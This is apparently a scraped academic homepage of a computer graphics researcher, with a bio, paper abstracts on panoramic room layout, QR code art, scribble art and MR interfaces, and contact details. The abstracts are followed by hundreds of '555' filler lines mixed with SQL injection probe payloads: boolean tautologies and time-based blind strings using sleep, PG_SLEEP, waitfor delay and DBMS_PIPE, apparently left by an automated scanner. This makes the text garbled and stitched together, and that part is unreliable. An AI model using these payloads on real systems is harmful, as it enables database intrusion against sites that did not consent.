Hung-Kuo received his B.S. degree in Computer Science and Information Engineering (CSIE) in 2003 from National Cheng-Kung University (NCKU), Taiwan. He continued to pursue a Ph.D degree in 2004 and completed the degree in 2010. During his Ph.D course, Hung-Kuo visited Hong Kong University Of Science And Technology (HKUST) in 2007 and Chinese University Of Hong Kong (CUHK) in 2009 under the guidance of Chiew-Lan Tai and Tien-Tsin Wong, respectively. Hung-Kuo also visited Indian Institute Of Technology (IIT) in 2008 and King Abdullah University Of Science And Technology (KAUST) in 2009 for two cooperative research projects both under the supervision of Niloy J. Mitra.
After the graduation, Hung-Kuo was recruited in a summer visiting internship of Yahoo! Inc. Research Lab under the supervision of Belle Tseng and Shyam Mittur.
Hung-Kuo’s major research interest is Computer Graphics including specific topics like Shape Analysis, Smart Manipulation, Video\Image Processing, Human Computer Interaction and Visual Perception.
Recent approaches for predicting layouts from 360° panoramas produce excellent results. These approaches build on a common framework consisting of three steps: a pre-processing step based on edge-based alignment, prediction of layout elements, and a post-processing step by fitting a 3D layout to the layout elements. Until now, it has been difficult to compare the methods due to multiple different design decisions, such as the encoding network (e.g., SegNet or ResNet), type of elements predicted (e.g., corners, wall/floor boundaries, or semantic segmentation), or method of fitting the 3D layout. To address this challenge, we summarize and describe the common framework, the variants, and the impact of the design decisions. For a complete evaluation, we also propose extended annotations for the Matterport3D dataset, and introduce two depth-based evaluation metrics.
Research has shown that turn-by-turn navigation guidance has made users overly reliant on such guidance, impairing their independent wayfinding ability. This paper compares the impacts of two new types of navigation guidance – reference-based and orientation-based – on their users’ ability to independently navigate to the same destinations, both as compared to each other, and as compared to two types of traditional turn-by-turn guidance, i.e., map-based and augmented-reality (AR) based. The results of our within-subjects experiment indicate that, while the use of reference-based guidance led to users taking more time to navigate when first receiving it, it boosted their subsequent ability to independently navigate to the same destination in less time, via more efficient routes, and with less assistance-seeking from their phones than either map-based or AR-based turn-by-turn navigation guidance did.
This paper presents a novel algorithm to generate micrography QR codes, a novel machine-readable graphic generated by embedding a QR code within a micrography image. The unique structure of micrography makes it incompatible with existing methods used to combine QR codes with natural or halftone images. We exploited the high-frequency nature of micrography in the design of a novel deformation model that enables the skillful warping of individual letters and adjustment of font weights to enable the embedding of a QR code within a micrography. The entire process is supervised by a set of visual quality metrics tailored specifically for micrography, in conjunction with a novel QR code quality measure aimed at striking a balance between visual fidelity and decoding robustness. The proposed QR code quality measure is based on probabilistic models learned from decoding experiments using popular decoders with synthetic QR codes to capture the various forms of distortion that result from image embedding. Experiment results demonstrate the efficacy of the proposed method in generating micrography QR codes of high quality from a wide variety of inputs. The ability to embed QR codes with multiple scales makes it possible to produce a wide range of diverse designs. Experiments and user studies were conducted to evaluate the proposed method from a qualitative as well as quantitative perspective.
Color scribbling is a unique form of illustration where artists use compact, overlapping, and monochromatic scribbles at microscopic scale to create astonishing colorful images at macroscopic scale. The creation process is skill-demanded and time-consuming, which typically involves drawing monochromatic scribbles layer-by-layer to depict true-color subjects using a limited color palette delicately. In this work, we present a novel computational framework for automatic generation of color scribble images from arbitrary raster images. The core contribution of our work lies in a novel color dithering model tailor-made for synthesizing a smooth color appearance using multiple layers of overlapped monochromatic strokes. Specifically, our system reconstructs the appearance of the input image by (i) generating layers of monochromatic scribbles based on a limited color palette derived from input image, and (ii) optimizing the drawing sequence among layers to minimize the visual color dissimilarity between dithered image and original image as well as the color banding artifacts. We demonstrate the effectiveness and robustness of our algorithm with various convincing results synthesized from a variety of input images with different stroke patterns. The experimental study further shows that our approach faithfully captures the scribble style and the color presentation at respectively microscopic and macroscopic scales, which is otherwise difficult for state-of-the-art methods.
We present a deep learning framework, called DuLa-Net,
to predict Manhattan-world 3D room layouts from a single RGB panorama. To achieve better prediction accuracy,
our method leverages two projections of the panorama at
once, namely the equirectangular panorama-view and the
perspective ceiling-view, that each contains different clues
about the room layouts. Our network architecture consists of two encoder-decoder branches for analyzing each
of the two views. In addition, a novel feature fusion structure is proposed to connect the two branches, which are
then jointly trained to predict the 2D floor plans and layout heights. To learn more complex room layouts, we introduce the Realtor360 dataset that contains panoramas
of Manhattan-world room layouts with different numbers
of corners. Experimental results show that our work outperforms recent state-of-the-art in prediction accuracy and
performance, especially in the rooms with non-cuboid layouts.
Interacting with digital contents in 3D is an essential component to various applications (e.g., modeling packages, gaming, virtual reality, etc.). A traditional interface such as keyboard-mouse or trackball usually demands non-trivial working space as well as a learning process. We present the design of EZ-Manipulator, a new 3D manipulation interface on smartphones that supports mobile, fast, and ambiguity-free interactions with 3D objects. Our system leverages the built-in multitouch input and gyroscope sensor of a smartphone to achieve 9DOF (nine Degrees of Freedom) axis-constrained manipulations and free-form rotation. Thus, using EZ-Manipulator to manipulate objects in 3D is easy. The user merely has to perform intuitive single- or two-finger gestures and rotating the device in hand(s) to achieve manipulations at respectively fine-grained and course level. We further investigate the ambiguous manipulations introduced by the indirect manipulations using multitouch interface and propose a dynamic virtual camera adjustment to effectively resolve the ambiguity. A preliminary study reports that our system has significant lower task completion times in comparison to the conventional keyboard-mouse interface, and receives positive user experience from both novices and experts.
Flat design is a modern style of graphics design that minimizes the number of design attributes required to convey 3D shapes. This approach suits design contexts requiring simplicity and efficiency, such as mobile computing devices. This ‘less-is-more’ design inspiration has posed significant challenges in practice since it selects from a restricted range of design elements (e.g., color and resolution) to represent complex shapes. In this work, we investigate a means of computationally generating a specialized 2D flat representation - image formed by black-and-white patches - from 3D shapes. We present a novel framework that automatically abstracts 3D man-made shapes into 2D binary images at multiple scales. Based on a set of identified design principles related to the inference of geometry and structure, our framework jointly analyzes the input 3D shape and its counterpart 2D representation, followed by executing a carefully devised layout optimization algorithm. The robustness and effectiveness of our method are demonstrated by testing it on a wide variety of man-made shapes and comparing the results with baseline methods via a pilot user study. We further present two practical applications that are likely to benefit from our work.
Mixed reality (MR) has changed the perspective we see and interact with our world. While the current-generation of MR head-mounted devices (HMDs) are capable of generating high quality visual contents, interaction in most MR applications typically relies on in-air hand gestures, gaze, or voice. These interfaces although are intuitive to learn, may easily lead to inaccurate operations due to fatigue or constrained by the environment. In this work, we present Dual-MR, a novel MR interaction system that i) synchronizes the MR viewpoints of HMD and handheld smartphone, and ii) enables precise, tactile, immersive and user-friendly object-level manipulations through the multi-touch input of smartphone.
In addition, Dual-MR allows multiple users to join the same MR coordinate system to facilitate the collaborate in the same physical space, which further broadens its usability.
A preliminary user study shows that our system easily overwhelms the conventional interface, which combines in-air hand gesture and gaze, in the completion time for a series of 3D object manipulation tasks in MR.
While the content of virtual reality (VR) has grown explosively in recent years, the advance of designing user-friendly control interfaces in VR still remains a slow pace. The most commonly used device, such as gamepad or controller, has fixed shape and weight, and thus can not provide realistic haptic feedback when interacting with virtual objects in VR. In this work, we present a novel and lightweight tracking system in the context of manipulating handheld objects in VR. Specifically, our system can effortlessly synchronize the 3D pose of arbitrary handheld objects between the real world and VR in realtime performance. The tracking algorithm is simple, which delicately leverages the power of Leap Motion and IMU sensor to respectively track object’s location and orientation. We demonstrate the effectiveness of our system with three VR applications use pencil, ping-pong paddle, and smartphone as control interfaces to provide users more immersive VR experience.
A large dataset of outdoor panoramas with ground truth labels of sun position (SP) can be a valuable training data for learning outdoor illumination. In general, the sun position (if exists) in an outdoor panorama corresponds to the pixel with highest luminance and contrast with respect to neighbor pixels. However, both image-based estimation and manual annotation can not obtain reliable SP due to complex interplay between sun light and sky appearance. Here, we present an efficient and reliable approach to estimate a SP from an outdoor panorama with accessible metadata. Specifically, we focus on the outdoor panoramas retrieved from Google Street View and leverages built-in metadata as well as a well-established Solar Position Algorithm to propose a set of candidate SPs. Next, a custom made luminance model is used to rank each candidate and a confidence metric is computed to effectively filter out trivial cases (e.g., cloudy day, sun is occluded). We extensively evaluated the efficacy of our approach by conducting an experimental study on a dataset with over 600 panoramas.
Press:
We present PanoAnnotator, a semi-automatic system that facilitates the annotation of 2D indoor panoramas to obtain high-quality 3D room layouts. Observing that fully-automatic methods are often restricted to a subset of indoor panoramas and generate room layouts with mediocre quality, we instead propose a hybrid method to recover high-quality room layouts by leveraging both automatic estimations and user edits. Specifically, our system first employs state-of-the-art methods to automatically extract 2D/3D features from input panorama, based on which an initial Manhattan world layout is estimated. Then, the user can further edit the layout structure via a set of intuitive operations, while the system will automatically refine the geometry according to the extracted features. The experimental results show that our automatic initialization outperforms a selected fully-automatic state-of-the-art method in producing room layouts with higher accuracy. In addition, our complete system reduces annotation time when comparing with a fully-manual tool for achieving the same high quality results.
Line drawing is a style of image abstraction where the perception of image is conveyed using distinct straight or curved lines. However, extracting semantically salient lines is not trivial and mastered only by skilled artists. While many parametric filters have successfully extracted accurate and coherent lines, their results are sensitive to parameters tuning and easily leading to either excessive or insufficient amount of lines. In this work, we present an interactive system to generate concise line abstraction of arbitrary images via a few user specified strokes. Specifically, the user simply has to provide a few intuitive strokes on the input images, including tracing roughly along the edges and scribbling on the region of interest, through a sketching interface. The system then automatically extracts lines that are long, coherent and share similar textural structures from a corresponding highly detailed line drawing image. We have tested our system with a wide variety of images. The experimental results show that our system outperforms state-of-the-art techniques in terms of quality and efficiency.
Video remains the method of choice for capturing temporal events. However, without access to the underlying 3D scene models, it remains difficult to make object level edits in a single video or across multiple videos. While it may be possible to explicitly reconstruct the 3D geometries to facilitate these edits, such a workflow is cumbersome, expensive, and tedious. In this work, we present a much simpler workflow to create plausible editing and mixing of raw video footage using only sparse structure points (SSP) directly recovered from the raw sequences. First, we utilize user-scribbles to structure the point representations obtained using structure-from-motion on the input videos. The resultant structure points, even when noisy and sparse, are then used to enable various video edits in 3D, including view perturbation, keyframe animation, object duplication and transfer across videos, etc. Specifically, we describe how to synthesize object images from new views adopting a novel image-based rendering technique using the SSPs as proxy for the missing 3D scene information. We propose a structure-preserving image warping on multiple input frames adaptively selected from object video, followed by a spatio-temporally coherent image stitching to compose the final object image. Simple planar shadows and depth maps are synthesized for objects to generate plausible video sequence mimicking real-world interactions. We demonstrate our system on a variety of input videos to produce complex edits, which are otherwise difficult to achieve.
Emergence is the visual phenomenon by which humans recognize the objects in a seemingly noisy image through aggregating information from meaningless pieces and perceiving a whole that is meaningful.Such an unique mental skill renders emergence an effective scheme to tell humans and machines apart.Images that are detectable by human but difficult for an automatic algorithm to recognize are also referred as emerging images.A recent state-of-the-art work proposes to synthesize images of 3D objects that are detectable by human but difficult for an automatic algorithm to recognize.Their results are further verified to be easy for humans to recognize while posing a hard time for automatic machines.However, using 3D objects as inputs prevents their system from being practical and scalable for generating an infinite number of high quality images.For instance, the image quality may degrade quickly as the viewing and lighting conditions changing in 3D domain, and the available resources of 3D models are usually limited.However, using 3D objects as inputs brings drawbacks.For instance, the quality of results is sensitive to the viewing and lighting conditions in the 3D domain.The available resources of 3D models are usually limited, and thus restricts the scalability.This paper presents a novel synthesis technique to automatically generate emerging images from regular photographs, which are commonly taken with decent setting and widely accessible online.We adapt the previous system to the 2D setting of input photographs and develop a set of image-based operations.Our algorithm is also designed to support the difficulty level control of resultant images through a limited set of parameters. We conducted several experiments to validate the efficacy and efficiency of our system.
Pixel art is a modern digital art in which high resolution images are abstracted into low resolution pixelated outputs using concise outlines and reduced color palettes. Creating pixel art is a labor intensive and skill-demanding process due to the challenge of using limited pixels to represent complicated shapes. Not surprisingly, generating pixel art animation is even harder given the additional constraints imposed in the temporal domain. Although many powerful editors have been designed to facilitate the creation of still pixel art images, the extension to pixel art animation remains an unexplored direction. Existing systems typically request users to craft individual pixels frame by frame, which is a tedious and error-prone process. In this work, we present a novel animation framework tailored to pixel art images. Our system bases on conventional key-frame animation framework and state-of-the-art image warping techniques to generate an initial animation sequence. The system then jointly optimizes the prominent feature lines of individual frames respecting three metrics that capture the quality of the animation sequence in both spatial and temporal domains. We demonstrate our system by generating visually pleasing animations on a variety of pixel art images, which would otherwise be difficult by applying state-of-the-art techniques due to severe artifacts.
Circular scribble art is a kind of line drawing where the seemingly random, noisy and shapeless circular scribbles at microscopic scale constitute astonishing grayscale images at macroscopic scale. Such a delicate skill has rendered the creation of circular scribble art a tedious and time-consuming task even for gifted artists. In this work, we present a novel method for automatic synthesis of circular scribble art. The synthesis problem is modeled as tracing along a virtual path using a parametric circular curve. To reproduce the tone and important edge structure of input grayscale images, the system adaptively adjusts the density and structure of virtual path, and dynamically controls the size, drawing speed and orientation of parametric circular curve during the synthesis. We demonstrate the potential of our system using several circular scribble images synthesized from a wide variety of grayscale images. A preliminary experimental studying is conducted to qualitatively and quantitatively evaluate our method. Results report that our method is efficient and generates convincing results comparable to artistic artworks.
LEGO, a popular brick-based toy construction system, provides an affordable and convenient way of fabricating geometric shapes. However, building arbitrary shapes using LEGO bricks with restrictive colors and sizes is not trivial. It requires careful design process to produce appealing, stable and constructable brick sculptures. In this work, we investigate the novel problem of constructing brick sculptures from pixel art images. In contrast to previous efforts that focus on 3D models, pixel art contains rich visual contents for generating engaging LEGO designs. On the other hand, the characteristics of pixel art and corresponding brick sculpture pose new challenges to the design process. We propose a novel computational framework to automatically construct brick sculptures from pixel arts. This is based on implementing a set of design guidelines concerning the visual quality as well as the structural stability of built sculptures. We demonstrate the effectiveness of our framework with various bricks sculptures (both real and virtual) generated from a variety of pixel art images. Experimental results show that our system is efficient and gains significant improvements over state-of-the-arts.
In this work, we propose an automatic algorithm to synthesize emerging images from regular photographs. To generate images that are easy for human, rendered complex splats that capture silhouette and shading information of 3D objects.However, we realize that comparative information could be retrieved from photographs as well and replace the rendering of black complex splats with superpixels. They further take two post processing steps to make segmentation harder for bots, and both of them could find counterpart operations in image domain. Supporting by public image databases such as flickr and Picasa, we can envision a potential CAPTCHA application of our approach to massively and efficiently generate emerging images from photographs.
Camouflage images contain one or more hidden figures that remain imperceptible or unnoticed for a while. In one possible explanation, the ability to delay the perception of the hidden figures is attributed to the theory that human perception works in two main phases: feature search and conjunction search. Effective camouflage images make feature based recognition difficult, and thus force the recognition process to employ conjunction search, which takes considerable effort and time. In this paper, we present a technique for creating camouflage images. To foil the feature search, we remove the original subtle texture details of the hidden figures and replace them by that of the surrounding apparent image. To leave an appropriate degree of clues for the conjunction search, we compute and assign new tones to regions in the embedded figures by performing an optimization between two conflicting terms, which we call immersion and standout, corresponding to hiding and leaving clues, respectively. We show a large number of camouflage images generated by our technique, with or without user guidance. We have tested the quality of the images in an extensive user study, showing a good control of the difficulty levels.
Emergence refers to the unique human ability to aggregate informationfrom seemingly meaningless pieces, and to perceive a wholethat is meaningful. This special skill of humans can constitute aneffective scheme to tell humans and machines apart. This paperpresents a synthesis technique to generate images of 3D objects thatare detectable by humans, but difficult for an automatic algorithmto recognize. The technique allows generating an infinite numberof images with emerging figures. Our algorithm is designed so thatlocally the synthesized images divulge little useful information orcues to assist any segmentation or recognition procedure. Therefore,as we demonstrate, computer vision algorithms are incapableof effectively processing such images. However, when a human observeris presented with an emergence image, synthesized using anobject she is familiar with, the figure emerges when observed as awhole. We can control the difficulty level of perceiving the emergenceeffect through a limited set of parameters. A procedure thatsynthesizes emergence images can be an effective tool for exploringand understanding the factors affecting computer vision techniques.
Extraction of curve-skeletons is a fundamental problem with many applications in computer graphics and visualization. In this paper, we present a simple and robust skeleton extraction method based on mesh contraction. The method works directly on the mesh domain, without pre-sampling the mesh model into a volumetric representation. The method first contracts the mesh geometry into a zero-volume skeletal shape by applying implicit Laplacian smoothing with global positional constraints. The contraction does not alter the mesh connectivity and retains the key features of the original mesh. The contracted mesh is then converted into a 1D curve-skeleton through a connectivity surgery process to remove all the collapsed faces while preserving the shape of the contracted mesh and the original topology. The centeredness of the skeleton is refined by exploiting the induced skeleton-mesh mapping. The contraction process generates valuable information about the object's geometry, in particular, the skeleton-vertex correspondence and the local thickness, which are useful for various applications. We demonstrate its effectiveness in mesh segmentation and skinning animation.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555RD0HTM9A
555
555
555
555
555
555
555
555
-1 OR 2+583-583-1=0+0+0+1 --
-1 OR 2+779-779-1=0+0+0+1
-1' OR 2+492-492-1=0+0+0+1 --
-1' OR 2+23-23-1=0+0+0+1 or 'MaHOA2yv'='
-1" OR 2+319-319-1=0+0+0+1 --
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555-1; waitfor delay '0:0:15' --
555
555
555-1); waitfor delay '0:0:15' --
555
555
555-1 waitfor delay '0:0:15' --
555
555
5556YgPZdE9'; waitfor delay '0:0:15' --
555
555
555-1 OR 640=(SELECT 640 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555-1) OR 521=(SELECT 521 FROM PG_SLEEP(15))--
555
555
555-1)) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
555
555
555b8mK63f4' OR 216=(SELECT 216 FROM PG_SLEEP(15))--
5557GGzHuZ7
555
555iTiWmvI0') OR 224=(SELECT 224 FROM PG_SLEEP(15))--
555
-1 OR 2+921-921-1=0+0+0+1 --
-1 OR 2+214-214-1=0+0+0+1
-1' OR 2+889-889-1=0+0+0+1 --
-1' OR 2+471-471-1=0+0+0+1 or 'CXq6TW2J'='
-1" OR 2+289-289-1=0+0+0+1 --
555
5551RGSp6GS')) OR 832=(SELECT 832 FROM PG_SLEEP(15))--
555*if(now()=sysdate(),sleep(15),0)
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%2527%2522\'\"
@@3hBjk
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555-1); waitfor delay '0:0:15' --
555
555
555-1 waitfor delay '0:0:15' --
555
555bckgZreX'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555-1 OR 827=(SELECT 827 FROM PG_SLEEP(15))--
555
555-1) OR 365=(SELECT 365 FROM PG_SLEEP(15))--
555
555-1)) OR 908=(SELECT 908 FROM PG_SLEEP(15))--
555
555NrOQrUc7' OR 579=(SELECT 579 FROM PG_SLEEP(15))--
555
555zY0sVt05') OR 151=(SELECT 151 FROM PG_SLEEP(15))--
555
5557TTrg4Yp')) OR 704=(SELECT 704 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%2527%2522\'\"
@@jENCv
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555pOAciYXF
555
-1 OR 2+251-251-1=0+0+0+1 --
-1 OR 2+591-591-1=0+0+0+1
-1' OR 2+125-125-1=0+0+0+1 --
-1' OR 2+662-662-1=0+0+0+1 or 'JUHO36Df'='
-1" OR 2+139-139-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
5558Ft7CzKW'; waitfor delay '0:0:15' --
555-1 OR 955=(SELECT 955 FROM PG_SLEEP(15))--
555-1) OR 89=(SELECT 89 FROM PG_SLEEP(15))--
555-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
555kGl97cmW' OR 984=(SELECT 984 FROM PG_SLEEP(15))--
555rcAXD1Gb') OR 274=(SELECT 274 FROM PG_SLEEP(15))--
555BRR7OoGP')) OR 630=(SELECT 630 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-1 OR 2+450-450-1=0+0+0+1 --
-1 OR 2+927-927-1=0+0+0+1
-1' OR 2+164-164-1=0+0+0+1 --
-1' OR 2+626-626-1=0+0+0+1 or 'Osbajqpd'='
-1" OR 2+629-629-1=0+0+0+1 --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%2527%2522\'\"
@@hks6e
if(now()=sysdate(),sleep(15),0)
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
@@Ns2Df
555
Email: hkchu(AT)cs.nthu.edu.tw
Phone: +886-3-5731215
Department of Computer Science
National Tsing Hua University
No. 101, Section 2, Kuang-Fu Road, Hsinchu, Taiwan 30013
Room 641, Delta Building